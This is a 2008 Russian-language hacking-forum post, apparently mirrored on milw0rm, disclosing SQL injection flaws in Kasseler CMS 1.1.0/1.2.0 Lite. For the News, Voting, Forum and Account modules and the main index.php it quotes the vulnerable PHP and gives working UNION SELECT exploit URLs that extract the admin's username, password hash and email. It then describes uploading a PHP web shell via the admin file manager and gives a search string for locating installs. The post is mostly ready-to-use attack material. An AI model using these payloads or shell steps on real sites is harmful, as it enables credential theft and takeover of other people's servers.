Форум АНТИЧАТ - Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection

Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection

13.09.2008, 17:44

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection

Офф.сайт: www.kasseler-cms.net
Префикс таблиц бд: kasseler_
Default hash: md5($pass)
Админка: http://localhost/admin.php

От автора:

Цитата:

Краткий перечень возможностей:

• Мощная система безопасности.

какая тут к чёрту безопасность

[SQL inj в модуле новостей News]

Сценарий /modules/News/index.php

уязвимый код:

PHP код:


		
			
}

    $num = isset($_GET['num']) ? intval($_GET['num']) : "1";

    $offset = ($num-1) * $config['view_limit'];

    $sort = (@$_GET['do']!="Popular") ? "n.date" : "n.view";

    $where = (@$_GET['do']=="Category") ? "AND n.cid=".@$_GET['cid']."  OR c.subid=".$_GET['cid']."" : "";

    $sorttopage = (@$_GET['do']=="Category" || @$_GET['do']=="Popular") ? "&do=".$_GET['do']."" : "";

    $sorttopage = (@$_GET['do']=="Category") ? $sorttopage."&cid=".$_GET['cid'] : $sorttopage;

    $result = $db->sql_query("SELECT n.comment, n.view, n.nid, n.title, n.beginning, n.content, n.author, n.date, n.cid, n.status, n.rating, n.voted, c.cid, c.title, c.module, c.description, c.image, c.subid FROM ".$prefix."_news AS n LEFT JOIN  ".$prefix."_categories AS c ON (n.cid=c.cid) WHERE n.status='1' $where ORDER BY $sort ".$config['msort']." LIMIT $offset, ".$config['view_limit']."");

    if ($db->sql_numrows($result)==0){

        inform("<center>"._NONEWS."</center>");

    }

    

....



$result = $db->sql_query("SELECT n.view, n.nid, n.title, n.beginning, n.content, n.author, n.date, n.cid, n.status, n.rating, n.voted, c.cid, c.title, c.module, c.description, c.image, c.subid, u.user_name FROM ".$prefix."_news AS n LEFT JOIN  ".$prefix."_categories AS c ON (n.cid=c.cid) LEFT JOIN ".$prefix."_users AS u ON (u.user_name=n.author) WHERE n.nid='".$_GET['nid']."' && n.status='1' ORDER BY n.date ".$config['msort']."");



....



$db->sql_query("DELETE FROM ".$prefix."_news WHERE nid='".$_GET['nid']."'");

Недостаточная обработка данных в параметре nid. Таким образом мы можем произвести запрос к бд(SQL-Inj) что бы получить нужную нам информацию.

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:

http://localhost/[installdir]/index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1/*

[SQL inj в модуле опросов Voting]

Сценарий /modules/Voting/index.php

уязвимый код:

PHP код:


		
			
<div><br />[ <a href=\"index.php?module=$module_name&do=Result&vid=".$_GET['vid']."\">"._VOTERESULT."</a> | <a 

 

....



$result = $db->sql_query("SELECT vid, title, vote_case, vote_ip, vote_users, pubdate, vote_res FROM ".$prefix."_voting WHERE vid='".$_GET['vid']."'");

баг оналогичен предыдущему.

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:

http://localhost/[installdir]/index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1/*

[SQL inj в модуле форума на сайте Forum]

Сценарий /modules/Forum/index.php

уязвимый код:

PHP код:


		
			
show_forums("<a class=\"forumlink\" href=\"index.php?module=$module_name&do=ShowForum&fid=$fforum_id\">"



....



liste = list_page_forum($count_topics, $numpages, $forum['topic_views_num'], "index.php?module=$module_name&do=ShowForum&fid=".$_GET['fid']."&page");

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:

http://localhost/[installdir]/index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1/*

Код:

http://localhost/[installdir]/index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1/*

[SQL inj в модуле профиля пользователя Account]

Сценарий /modules/Account/index.php

уязвимый код:

PHP код:


		
			
$result=$db->sql_query("SELECT u.rating, u.voted, u.user_last_visit, u.uid, u.user_name, u.user_email, u.user_website, u.user_avatar, u.user_regdate, u.user_icq, u.user_aim, u.user_yim, u.user_msnm, u.user_last_ip, u.user_birthday, u.user_gender, u.locality, u.signature, u.interests, u.occupation, u.viewemail, u.viewip, u.user_group, g.gid, g.title, g.color, g.img FROM ".$prefix."_users AS u LEFT JOIN ".$prefix."_groups AS g ON(g.gid=u.user_group) WHERE user_name='".$_GET['uname']."' AND u.user_name<>'Guest'");

Условие: magic_quotes_gpc = Off

Эксплойт:

Код:

http://localhost/[installdir]/index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1/*

Сценарий /index.php

Условие: magic_quotes_gpc = Off

уязвимый код:

PHP код:


		
			
 if (@$module_title=="" || !isset($module_title)) 

                    list($module_title, $blocks_view) = $db->sql_fetchrow($db->sql_query("SELECT custom_title, blocks FROM ".$prefix."_modules WHERE title='$module_name'"));

Код:

http://localhost/[installdir]/index.php?module=1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1/*

Заливка шелла:

Заходим в админку (http://localhost/admin.php)-> Файловый менеджер -> Каталог: uploads/avatars/ -> загрузка файлов shell.php.

Шелл будет тут:

http://localhost/uploads/avatars/shell.php

Поиск:

Web site engine code is Copyright ©2007-2008 by Kasseler CMS. All rights reserved.

http://milw0rm.com/exploits/6460 (c) ~!Dok_tOR!~

Последний раз редактировалось ~!DoK_tOR!~; 15.09.2008 в 08:07..